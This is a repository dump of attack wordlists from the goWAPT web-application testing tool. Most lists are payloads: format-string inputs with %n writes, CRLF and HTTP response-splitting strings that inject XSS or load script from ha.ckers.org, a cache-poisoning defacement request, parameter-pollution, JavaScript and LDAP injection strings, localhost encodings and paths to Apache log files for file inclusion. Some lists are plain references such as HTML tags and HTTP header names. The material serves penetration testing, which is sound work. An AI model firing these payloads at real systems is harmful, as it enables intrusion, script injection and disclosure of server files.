https://raw.githubusercontent.com/dzonerzy/goWAPT/3aed792cbca3ec8f7fbf106c39116b197188924b/wordlist/attack/file-upload/malicious-images/POC_phpinfo-metadata.jpg -------------------------------------------------------------------------------- /wordlist/attack/file-upload/malicious-images/eicar.com.txt: -------------------------------------------------------------------------------- 1 | X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* -------------------------------------------------------------------------------- /wordlist/attack/file-upload/malicious-images/lottapixel.jpg: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/dzonerzy/goWAPT/3aed792cbca3ec8f7fbf106c39116b197188924b/wordlist/attack/file-upload/malicious-images/lottapixel.jpg -------------------------------------------------------------------------------- /wordlist/attack/file-upload/malicious-images/uber.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dzonerzy/goWAPT/3aed792cbca3ec8f7fbf106c39116b197188924b/wordlist/attack/file-upload/malicious-images/uber.gif -------------------------------------------------------------------------------- /wordlist/attack/file-upload/malicious-images/xssproject.swf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dzonerzy/goWAPT/3aed792cbca3ec8f7fbf106c39116b197188924b/wordlist/attack/file-upload/malicious-images/xssproject.swf -------------------------------------------------------------------------------- /wordlist/attack/format-strings/format-strings.txt: -------------------------------------------------------------------------------- 1 | %s%p%x%d 2 | %p%p%p%p 3 | %x%x%x%x 4 | %d%d%d%d 5 | %s%s%s%s 6 | %99999999999s 7 | %08x 8 | %20d 9 | %20n 10 | %20x 11 | %20s 12 | %d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d 13 | %i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i 14 | %o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o 15 | %u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u 16 | %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x 17 | %X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X 18 | 
%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a 19 | %A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A 20 | %e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e 21 | %E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E 22 | %f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f 23 | %F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F 24 | %g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g 25 | %G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G 26 | %s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s 27 | %p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p 28 | %#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%% 29 | XXXXX.%p 30 | XXXXX`perl -e 'print ".%p" x 80'` 31 | `perl -e 'print ".%p" x 80'`%n 32 | %08x.%08x.%08x.%08x.%08x\n 33 | XXX0_%08x.%08x.%08x.%08x.%08x\n 34 | %.16705u%2\$hn 35 | \x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s| 36 | AAAAA%c 37 | AAAAA%d 38 | AAAAA%e 39 | AAAAA%f 40 | AAAAA%I 41 | AAAAA%o 42 | AAAAA%p 43 | AAAAA%s 44 | AAAAA%x 45 | AAAAA%n 46 | ppppp%c 47 | ppppp%d 48 | ppppp%e 49 | ppppp%f 50 | ppppp%I 51 | ppppp%o 52 | ppppp%p 53 | ppppp%s 54 | ppppp%x 55 | ppppp%n 56 | %@ 57 | %@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@ 58 | -------------------------------------------------------------------------------- /wordlist/attack/html_js_fuzz/html_attributes.txt: 
-------------------------------------------------------------------------------- 1 | accept 2 | accept-charset 3 | accesskey 4 | action 5 | align 6 | alt 7 | async 8 | autocomplete 9 | autofocus 10 | autoplay 11 | bgcolor 12 | border 13 | challenge 14 | charset 15 | checked 16 | cite 17 | class 18 | color 19 | cols 20 | colspan 21 | content 22 | contenteditable 23 | contextmenu 24 | controls 25 | coords 26 | data 27 | data-userdefined-attribute 28 | datetime 29 | default 30 | defer 31 | dir 32 | dirname 33 | disabled 34 | download 35 | draggable 36 | dropzone 37 | enctype 38 | for 39 | form 40 | formaction 41 | headers 42 | height 43 | hidden 44 | high 45 | href 46 | hreflang 47 | http-equiv 48 | id 49 | ismap 50 | keytype 51 | kind 52 | label 53 | lang 54 | list 55 | loop 56 | low 57 | manifest 58 | max 59 | maxlength 60 | media 61 | method 62 | min 63 | multiple 64 | muted 65 | name 66 | novalidate 67 | onabort 68 | onafterprint 69 | onbeforeprint 70 | onbeforeunload 71 | onblur 72 | oncanplay 73 | oncanplaythrough 74 | onchange 75 | onclick 76 | oncontextmenu 77 | oncopy 78 | oncuechange 79 | oncut 80 | ondblclick 81 | ondrag 82 | ondragend 83 | ondragenter 84 | ondragleave 85 | ondragover 86 | ondragstart 87 | ondrop 88 | ondurationchange 89 | onemptied 90 | onended 91 | onerror 92 | onfocus 93 | onhashchange 94 | oninput 95 | oninvalid 96 | onkeydown 97 | onkeypress 98 | onkeyup 99 | onload 100 | onloadeddata 101 | onloadedmetadata 102 | onloadstart 103 | onmessage 104 | onmousedown 105 | onmousemove 106 | onmouseout 107 | onmouseover 108 | onmouseup 109 | onmousewheel 110 | onoffline 111 | ononline 112 | onpagehide 113 | onpageshow 114 | onpaste 115 | onpause 116 | onplay 117 | onplaying 118 | onpopstate 119 | onprogress 120 | onratechange 121 | onreset 122 | onresize 123 | onscroll 124 | onsearch 125 | onseeked 126 | onseeking 127 | onselect 128 | onshow 129 | onstalled 130 | onstorage 131 | onsubmit 132 | onsuspend 133 | ontimeupdate 134 | ontoggle 135 | 
onunload 136 | onvolumechange 137 | onwaiting 138 | onwheel 139 | open 140 | optimum 141 | pattern 142 | placeholder 143 | poster 144 | preload 145 | readonly 146 | rel 147 | required 148 | reversed 149 | rows 150 | rowspan 151 | sandbox 152 | scope 153 | scoped 154 | selected 155 | shape 156 | size 157 | sizes 158 | span 159 | spellcheck 160 | src 161 | srcdoc 162 | srclang 163 | start 164 | step 165 | style 166 | tabindex 167 | target 168 | title 169 | translate 170 | type 171 | usemap 172 | value 173 | width 174 | wrap 175 | -------------------------------------------------------------------------------- /wordlist/attack/html_js_fuzz/html_tags.txt: -------------------------------------------------------------------------------- 1 | !-- -- 2 | !DOCTYPE 3 | a 4 | abbr 5 | acronym 6 | address 7 | applet 8 | area 9 | article 10 | aside 11 | audio 12 | b 13 | base 14 | basefont 15 | bdi 16 | bdo 17 | big 18 | blockquote 19 | body 20 | br 21 | button 22 | canvas 23 | caption 24 | center 25 | cite 26 | code 27 | col 28 | colgroup 29 | datalist 30 | dd 31 | del 32 | details 33 | dfn 34 | dialog 35 | dir 36 | div 37 | dl 38 | dt 39 | em 40 | embed 41 | fieldset 42 | figcaption 43 | figure 44 | font 45 | footer 46 | form 47 | frame 48 | frameset 49 | h1 50 | h2 51 | h3 52 | h4 53 | h5 54 | h6 55 | head 56 | header 57 | hr 58 | html 59 | i 60 | iframe 61 | img 62 | input 63 | ins 64 | kbd 65 | keygen 66 | label 67 | legend 68 | li 69 | link 70 | main 71 | map 72 | mark 73 | menu 74 | menuitem 75 | meta 76 | meter 77 | nav 78 | noframes 79 | noscript 80 | object 81 | ol 82 | optgroup 83 | option 84 | output 85 | p 86 | param 87 | pre 88 | progress 89 | q 90 | rp 91 | rt 92 | ruby 93 | s 94 | samp 95 | script 96 | section 97 | select 98 | small 99 | source 100 | span 101 | strike 102 | strong 103 | style 104 | sub 105 | summary 106 | sup 107 | table 108 | tbody 109 | td 110 | textarea 111 | tfoot 112 | th 113 | thead 114 | time 115 | title 116 | tr 117 | track 118 | tt 119 | 
u 120 | ul 121 | var 122 | video 123 | wbr 124 | -------------------------------------------------------------------------------- /wordlist/attack/html_js_fuzz/javascript_events.txt: -------------------------------------------------------------------------------- 1 | onafterprint 2 | onbeforeprint 3 | onbeforeonload 4 | onblur 5 | onerror 6 | onfocus 7 | onhaschange 8 | onload 9 | onmessage 10 | onoffline 11 | ononline 12 | onpagehide 13 | onpageshow 14 | onpopstate 15 | onredo 16 | onresize 17 | onstorage 18 | onundo 19 | onunload 20 | onblur 21 | onchange 22 | oncontextmenu 23 | onfocus 24 | onformchange 25 | onforminput 26 | oninput 27 | oninvalid 28 | onreset 29 | onselect 30 | onsubmit 31 | onkeydown 32 | onkeypress 33 | onkeyup 34 | onclick 35 | ondblclick 36 | ondrag 37 | ondragend 38 | ondragenter 39 | ondragleave 40 | ondragover 41 | ondragstart 42 | ondrop 43 | onmousedown 44 | onmousemove 45 | onmouseout 46 | onmouseover 47 | onmouseup 48 | onmousewheel 49 | onscroll 50 | onabort 51 | oncanplay 52 | oncanplaythrough 53 | ondurationchange 54 | onemptied 55 | onended 56 | onerror 57 | onloadeddata 58 | onloadedmetadata 59 | onloadedstart 60 | onpause 61 | onplay 62 | onplaying 63 | onprogress 64 | onratechange 65 | onreadystatechange 66 | onseeked 67 | onseeking 68 | onstalled 69 | onsuspend 70 | ontimeupdate 71 | onvolumechange 72 | onwaiting 73 | style 74 | 75 | -------------------------------------------------------------------------------- /wordlist/attack/html_js_fuzz/js_inject.txt: -------------------------------------------------------------------------------- 1 | function(){ return this.userid} 2 | ' function(){ return this.username} or '1'='1 3 | function(){return version()} 4 | function(){return version} 5 | t'; return this; var d='! 6 | " function(){ return this} or '1'='1 7 | t"; return this; var d='! 
8 | ' || this || '1'=='1 9 | ' || this.version || '1'=='1 10 | ' || '1'=='1 11 | -------------------------------------------------------------------------------- /wordlist/attack/html_js_fuzz/quotationmarks.txt: -------------------------------------------------------------------------------- 1 | ' 2 | " 3 | '' 4 | "" 5 | '"' 6 | "''''"'" 7 | "'"'"''''" 8 | 9 | 10 | 11 | 12 | -------------------------------------------------------------------------------- /wordlist/attack/http-protocol/crlf-injection.txt: -------------------------------------------------------------------------------- 1 | %0d%0a 2 | %0d%0a%0d%0a 3 | r%0d%0aContentLength:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContentType:%20text/html%0d%0aContentLength:%2019%0d%0a%0d%0aInjected%02Content 4 | %0d%0d%0a%0a 5 | 0x0D0x0A 6 | 0x0D0x0D0x0A0x0A 7 | \r\n 8 | %5cr%5cn 9 | %0%0d%0ad%0%0d%0aa 10 | %0%0D%0AD%0%0D%0AA 11 | %0d%0aContentType:%20text/html;charset=UTF-7%0d%0aContent-Length:%20129%0d%0a%0d%0a%2BADw-html%2BAD4-%2BADw-body%2BAD4-%2BADw-script%2BAD4-alert%28%27XSS,cookies:%27%2Bdocument.cookie%29%2BADw-/script%2BAD4-%2BADw-/body%2BAD4-%2BADw-/html%2BAD4 12 | %0AContent-Type:html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E 13 | %0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E 14 | %0AContent-Type:html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3Ehttp://www.test.com 15 | %0d%0a%0d%0a%3Chtml%3E%3Cbody%3E%3C%2Fbody%3E%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fs.js%3E%3C%2Fscript%3E%3Cscript%3Ealert(%22location.host%20is:%20%22%2Blocation.host)%3C%2Fscript%3E%3C%2Fhtml%3E 16 | %0d%0a%0d%0a%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2Fscript%3E 17 | %22%3E%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3C%22 18 | %0AContent-type:%20text/html%0A%0Ahttp://www.test.com/%3Cscript%3Ealert(%22XSS%22)%3C/script%3E 19 | %0d%0a%0d%0a%3Cscript%3Ealert(%22XSS%22)%3C%2Fscript%3E 20 | %0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E 21 | 
-------------------------------------------------------------------------------- /wordlist/attack/http-protocol/hpp.txt: -------------------------------------------------------------------------------- 1 | # HTTP parameter pollution and interpretation payloads by Jacco van Tuijl 2 | ?id=id=1 3 | &id=1?id=2 4 | ?id['&id=1']=2 5 | ?id[1&id=2]=1 6 | ?id=1&id=2 7 | &id=1&id=2 8 | ?id=1%26id%3D2 9 | ?id&id=1 10 | ????id=1 11 | &&&&id=1 12 | ?id=id['1']=2 13 | ?id=1#id=2 14 | ?id==1 15 | ?id===1 16 | ;id=1?id=2 17 | ?id;id=1 18 | &id=1;id=2 19 | #id=1?id=2&id=3 20 | ?id=1,2 21 | ?id1,id2=1 22 | ?id[=1&id=2]=3 23 | ?id[&id=2]=1 24 | ?id=[1,2] 25 | ?id&=1 26 | ?id[]=1&id=2 27 | ?id=/:@&=+$&id=2 28 | ?id[=/:@&=+$&id=2]=1 29 | ?id={id:{id:1},2} 30 | ?id[{id:{id[]:1},2}]=3 31 | ?id=%23?id=1 32 | ?id=1%26id=2 33 | ?id=1%2526id=2 34 | ?id=1%c0%a6id=2 35 | ?id=1\uc0a6id=2 36 | ?id=1&id=2 37 | ?id=1&id=2 38 | ?id=1%u0026;id=2 -------------------------------------------------------------------------------- /wordlist/attack/http-protocol/http-header-cache-poison.txt: -------------------------------------------------------------------------------- 1 | # Header Injection / Cache Poison 1.0 (fuzz the entire get req) (12 April 2010) 2 | # creative commons license http://creativecommons.org/licenses/by/3.0/ 3 | # projurl 4 | GET http://{SITE}testsite.com/redir.php?site=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aLast-Modified:%20Mon,%2027%20Oct%202009%2014:50:18%20GMT%0d%0aContent-Length:%2020%0d%0aContent-Type:%20text/html%0d%0a%0d%0adeface! HTTP/1.1GET http://{SITE}/{REDIRECTURL}?site=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aLast-Modified:%20Mon,%2027%20Oct%202009%2014:50:18%20GMT%0d%0aContent-Length:%2020%0d%0aContent-Type:%20text/html%0d%0a%0d%0adeface! 
HTTP/1.1 5 | %0d%0aX-Injection-Header:%20AttackValue 6 | -------------------------------------------------------------------------------- /wordlist/attack/http-protocol/http-protocol-methods.txt: -------------------------------------------------------------------------------- 1 | OPTIONS 2 | GET 3 | HEAD 4 | POST 5 | PUT 6 | DELETE 7 | TRACE 8 | TRACK 9 | CONNECT 10 | PROPFIND 11 | PROPPATCH 12 | MKCOL 13 | COPY 14 | MOVE 15 | LOCK 16 | UNLOCK 17 | VERSION-CONTROL 18 | REPORT 19 | CHECKOUT 20 | CHECKIN 21 | UNCHECKOUT 22 | MKWORKSPACE 23 | UPDATE 24 | LABEL 25 | MERGE 26 | BASELINE-CONTROL 27 | MKACTIVITY 28 | ORDERPATCH 29 | ACL 30 | PATCH 31 | SEARCH 32 | ARBITRARY 33 | BCOPY 34 | BDELETE 35 | BMOVE 36 | BPROPFIND 37 | BPROPPATCH 38 | DEBUG 39 | INDEX 40 | NOTIFY 41 | POLL 42 | RPC_IN_DATA 43 | RPC_OUT_DATA 44 | SUBSCRIBE 45 | UNSUBSCRIBE 46 | X-MS-ENUMATTS 47 | -------------------------------------------------------------------------------- /wordlist/attack/http-protocol/http-request-header-field-names.txt: -------------------------------------------------------------------------------- 1 | Accept 2 | Accept-Charset 3 | Accept-Encoding 4 | Accept-Language 5 | Accept-Datetime 6 | Authorization 7 | Cache-Control 8 | Connection 9 | Cookie 10 | Content-Length 11 | Content-MD5 12 | Content-Type 13 | Date 14 | Expect 15 | From 16 | Host 17 | If-Match 18 | If-Modified-Since 19 | If-None-Match 20 | If-Range 21 | If-Unmodified-Since 22 | Max-Forwards 23 | Origin 24 | Pragma 25 | Proxy-Authorization 26 | Range 27 | Referer 28 | TE 29 | User-Agent 30 | Upgrade 31 | Via 32 | Warning 33 | X-Requested-With 34 | DNT 35 | X-Forwarded-For 36 | X-Forwarded-Host 37 | X-Forwarded-Proto 38 | Front-End-Https 39 | X-Http-Method-Override 40 | X-ATT-DeviceId 41 | X-Wap-Profile 42 | Proxy-Connection -------------------------------------------------------------------------------- /wordlist/attack/http-protocol/http-response-header-field-names.txt: 
-------------------------------------------------------------------------------- 1 | Access-Control-Allow-Origin 2 | Accept-Ranges 3 | Age 4 | Allow 5 | Cache-Control 6 | Connection 7 | Content-Encoding 8 | Content-Language 9 | Content-Length 10 | Content-Location 11 | Content-MD5 12 | Content-Disposition 13 | Content-Range 14 | Content-Type 15 | Date 16 | ETag 17 | Expires 18 | Last-Modified 19 | Link 20 | Location 21 | P3P 22 | Pragma 23 | Proxy-Authenticate 24 | Refresh 25 | Retry-After 26 | Server 27 | Set-Cookie 28 | Status 29 | Strict-Transport-Security 30 | Trailer 31 | Transfer-Encoding 32 | Upgrade 33 | Vary 34 | Via 35 | Warning 36 | WWW-Authenticate 37 | X-Frame-Options 38 | Public-Key-Pins 39 | X-XSS-Protection 40 | Content-Security-Policy 41 | X-Content-Security-Policy 42 | X-WebKit-CSP 43 | X-Content-Type-Options 44 | X-Powered-By 45 | X-UA-Compatible -------------------------------------------------------------------------------- /wordlist/attack/http-protocol/known-uri-types.txt: -------------------------------------------------------------------------------- 1 | aaa: 2 | aaas: 3 | about: 4 | acap: 5 | adiumxtra: 6 | afp: 7 | aim: 8 | apt: 9 | aw: 10 | beshare: 11 | bitcoin: 12 | bolo: 13 | callto: 14 | cap: 15 | chrome: 16 | cid: 17 | coap: 18 | content: 19 | crid: 20 | cvs: 21 | data: 22 | dav: 23 | dict: 24 | dns: 25 | doi: 26 | ed2k: 27 | facetime: 28 | fax: 29 | feed: 30 | file: 31 | finger: 32 | fish: 33 | ftp: 34 | geo: 35 | gg: 36 | git: 37 | gizmoproject: 38 | go: 39 | gopher: 40 | gtalk: 41 | h323: 42 | http: 43 | https: 44 | iax: 45 | icap: 46 | im: 47 | imap: 48 | info: 49 | ipp: 50 | irc: 51 | irc6: 52 | ircs: 53 | iris.beep: 54 | iris.lws: 55 | iris.xpcs: 56 | iris.xpc: 57 | iris: 58 | itms: 59 | jar: 60 | javascript: 61 | keyparc: 62 | lastfm: 63 | ldap: 64 | ldaps: 65 | lsid: 66 | magnet: 67 | mailto: 68 | maps: 69 | market: 70 | message: 71 | mid: 72 | mms: 73 | modem: 74 | msnim: 75 | msrps: 76 | msrp: 77 | mtqp: 78 | mumble: 79 | 
mupdate: 80 | mvn: 81 | news: 82 | nfs: 83 | nntp: 84 | notes: 85 | opaquelocktoken: 86 | palm: 87 | paparazzi: 88 | platform: 89 | pop: 90 | pres: 91 | prospero: 92 | proxy: 93 | psyc: 94 | query: 95 | rmi: 96 | rsync: 97 | rtmp: 98 | rtsp: 99 | secondlife: 100 | service: 101 | sftp: 102 | sgn: 103 | shttp: 104 | sieve: 105 | sip: 106 | sips: 107 | skype: 108 | smb: 109 | sms: 110 | snmp: 111 | soap.beeps: 112 | soap.beep: 113 | soldat: 114 | spotify: 115 | ssh: 116 | steam: 117 | svn: 118 | tag: 119 | teamspeak: 120 | tel: 121 | telnet: 122 | tftp: 123 | things: 124 | thismessage: 125 | tip: 126 | tv: 127 | udp: 128 | unreal: 129 | urn: 130 | ut2004: 131 | uuid: 132 | vemmi: 133 | ventrilo: 134 | view-source: 135 | wais: 136 | webcal: 137 | wss: 138 | ws: 139 | wtai: 140 | wyciwyg: 141 | xfire: 142 | xmlrpc.beeps: 143 | xmlrpc.beep : 144 | xmpp: 145 | xri: 146 | ymsgr: 147 | z39.50r: 148 | z39.50s: 149 | -------------------------------------------------------------------------------- /wordlist/attack/http-protocol/user-agents.txt: -------------------------------------------------------------------------------- 1 | # List of user agents from jbrofuzz (13 april 2010) 2 | User-Agent: Mozilla/1.22 (compatible; MSIE 2.0d; Windows NT) 3 | User-Agent: Mozilla/2.0 (compatible; MSIE 3.02; Update a; Windows NT) 4 | User-Agent: Mozilla/4.0 (compatible; MSIE 4.01; Windows NT) 5 | User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0) 6 | User-Agent: Mozilla/4.79 [en] (WinNT; U) 7 | User-Agent: Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:0.9.2) Gecko/20010726 Netscape6/6.1 8 | User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 9 | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) 10 | User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.19) Gecko/20081204 SeaMonkey/1.1.14 11 | 
User-Agent: Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaE90-1/210.34.75 Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413 12 | User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 2_2 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5G77 Safari/525.20 13 | User-Agent: Mozilla/5.0 (Linux; U; Android 1.5; en-gb; HTC Magic Build/CRB17) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 14 | User-Agent: Opera/9.27 (Windows NT 5.1; U; en) 15 | User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1 16 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322) 17 | User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.4.154.25 Safari/525.19 18 | User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.48 Safari/525.19 19 | User-Agent: Wget/1.8.2 20 | User-Agent: Mozilla/5.0 (PLAYSTATION 3; 1.00) 21 | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; (R1 1.6)) 22 | User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1 23 | User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729) JBroFuzz/1.4 24 | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506) 25 | User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20050923 CentOS/1.0.7-1.4.1.centos4 Firefox/1.0.7 26 | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727) 27 | User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.5) Gecko/2008120122 
Firefox/3.0.5 28 | User-Agent: Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.7) Gecko/20070606 29 | User-Agent: Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.14) Gecko/20080520 Firefox/2.0.0.14 30 | User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.5) Gecko/2008120121 Firefox/3.0.5 31 | -------------------------------------------------------------------------------- /wordlist/attack/integer-overflow/integer-overflows.txt: -------------------------------------------------------------------------------- 1 | -1 2 | 0 3 | 0x100 4 | 0x1000 5 | 0x3fffffff 6 | 0x7ffffffe 7 | 0x7fffffff 8 | 0x80000000 9 | 0xfffffffe 10 | 0xffffffff 11 | 0x10000 12 | 0x100000 13 | -------------------------------------------------------------------------------- /wordlist/attack/ip/localhost.txt: -------------------------------------------------------------------------------- 1 | 127.0.0.1 2 | 127.0.0.2 3 | 127.1 4 | 127.2 5 | ::1 6 | 0:0:0:0:0:0:0:1 7 | 0:0:0:000:0:0:0:1 8 | 0000:0000:0000:0000:0000:0000:0000:0001 9 | 2130706433 10 | 2130706434 11 | 7F000001 12 | 7F000002 13 | localhost 14 | -------------------------------------------------------------------------------- /wordlist/attack/ldap/ldap-injection.txt: -------------------------------------------------------------------------------- 1 | ! 
2 | %21 3 | %26 4 | %28 5 | %29 6 | %2A%28%7C%28mail%3D%2A%29%29 7 | %2A%28%7C%28objectclass%3D%2A%29%29 8 | %2A%7C 9 | %7C 10 | \21 11 | \26 12 | \28 13 | \29 14 | & 15 | ( 16 | ) 17 | * 18 | *()|%26' 19 | *()|&' 20 | *(|(mail=*)) 21 | *(|(objectclass=*)) 22 | *)(uid=*))(|(uid=* 23 | (*)*) 24 | *)* 25 | */* 26 | *| 27 | / 28 | // 29 | //* 30 | @* 31 | | 32 | admin* 33 | admin*)((|userpassword=*) 34 | admin*)((|userPassword=*) 35 | x' or name()='username' or 'x'='y 36 | -------------------------------------------------------------------------------- /wordlist/attack/lfi/common-ms-httpd-log-locations.txt: -------------------------------------------------------------------------------- 1 | \Program Files\Apache Group\Apache\logs\access.log 2 | \Program Files\Apache Group\Apache\logs\error.log 3 | \Program Files\Apache Group\Apache\conf\httpd.conf 4 | \Program Files\Apache Group\Apache2\conf\httpd.conf 5 | \Program Files (x86)\Apache Group\Apache\logs\access.log 6 | \Program Files (x86)\Apache Group\Apache\logs\error.log 7 | -------------------------------------------------------------------------------- /wordlist/attack/lfi/common-unix-httpd-log-locations.txt: -------------------------------------------------------------------------------- 1 | /apache/logs/error.log 2 | /apache/logs/access.log 3 | /apache/logs/error.log 4 | /apache/logs/access.log 5 | /apache/logs/error.log 6 | /apache/logs/access.log 7 | /etc/httpd/logs/acces_log 8 | /etc/httpd/logs/acces.log 9 | /etc/httpd/logs/error_log 10 | /etc/httpd/logs/error.log 11 | /var/www/logs/access_log 12 | /var/www/logs/access.log 13 | /usr/local/apache/logs/access_log 14 | /usr/local/apache/logs/access.log 15 | /var/log/apache/access_log 16 | /var/log/apache2/access_log 17 | /var/log/apache/access.log 18 | /var/log/apache2/access.log 19 | /var/log/access_log 20 | /var/log/access.log 21 | /var/www/logs/error_log 22 | /var/www/logs/error.log 23 | /usr/local/apache/logs/error_log 24 | /usr/local/apache/logs/error.log 25 
